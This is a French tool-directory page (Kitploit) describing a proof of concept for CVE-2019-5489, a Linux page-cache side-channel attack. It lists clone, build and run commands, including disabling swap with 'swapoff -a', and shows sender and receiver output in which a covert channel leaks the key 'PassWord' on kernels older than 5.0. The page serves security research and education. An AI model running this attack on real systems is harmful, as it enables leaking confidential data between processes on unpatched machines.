Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2019-5489 — Page Cache Side Channel Attacks (CVE-2019-5489) proof of concept for Linux | Kitploit
Outils/GitHubGitHub/mmxsrup/cve-2019-5489
Vulnerability AnalysisExploitationInformation GatheringPapers & ResearchLearning & EducationBinary Exploitation
GitHubmmxsrup/cve-2019-5489

CVE-2019-5489

Page Cache Side Channel Attacks (CVE-2019-5489) proof of concept for Linux

Voir le dépôt
103il y a 4 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE 2019-5489

Ce dépôt contient une preuve de concept des attaques par canal latéral du cache de pages (CVE-2019-5489) pour Linux.

Afin d'évaluer le canal latéral du cache de pages, j'ai implémenté un canal caché entre deux processus. Le processus émetteur envoie des données confidentielles à un processus récepteur via le canal latéral du cache de pages. Les attaques du cache de pages ont été atténuées dans Linux Kernel 5.0 et versions ultérieures, donc cette PoC ne fonctionnera qu'avant Linux Kernel 5.0.

NOTE : J'ai testé et cela fonctionne sur Ubuntu 18.04, Linux 4.15.0-70.

Building

Exécutez la commande suivante.

root@kitploit:~
git clone https://github.com/mmxsrup/CVE-2019-5489
cd CVE-2019-5489
make

Running

Désactivez l'espace d'échange pour faciliter l'attaque.

root@kitploit:~
swapoff -a

Terminal 1

Tout d'abord, exécutez la commande suivante dans le terminal 1.

root@kitploit:~
make run-sender

Terminal 2

Une fois que sending 1th character ... s'affiche dans le terminal 1, exécutez la commande suivante.

root@kitploit:~
make run-receiver

Output

Si l'exécution réussit, la sortie suivante sera affichée.
Cela montre que la clé a été envoyée du processus Émetteur au processus Récepteur via le canal latéral du cache de pages.

Terminal 1

root@kitploit:~
LD_LIBRARY_PATH=. ./sender
Sender process
ecicting page cache ...
sending 1th character ...
ecicting page cache ...
sending 2th character ...
ecicting page cache ...
sending 3th character ...
ecicting page cache ...
sending 4th character ...
ecicting page cache ...
sending 5th character ...
ecicting page cache ...
sending 6th character ...
ecicting page cache ...
sending 7th character ...
ecicting page cache ...
sending 8th character ...
ecicting page cache ...
sending 9th character ...

Terminal 2

root@kitploit:~
LD_LIBRARY_PATH=. ./receiver
Sender process
waiting ...
recved caracter(P)
waiting ...
recved caracter(a)
waiting ...
recved caracter(s)
waiting ...
recved caracter(s)
waiting ...
recved caracter(W)
waiting ...
recved caracter(o)
waiting ...
recved caracter(r)
waiting ...
recved caracter(d)
waiting ...
recved caracter()
Received key: PassWord

References

  • Daniel Gruss et al. Page cache attacks [CCS 19]
Télécharger l’outil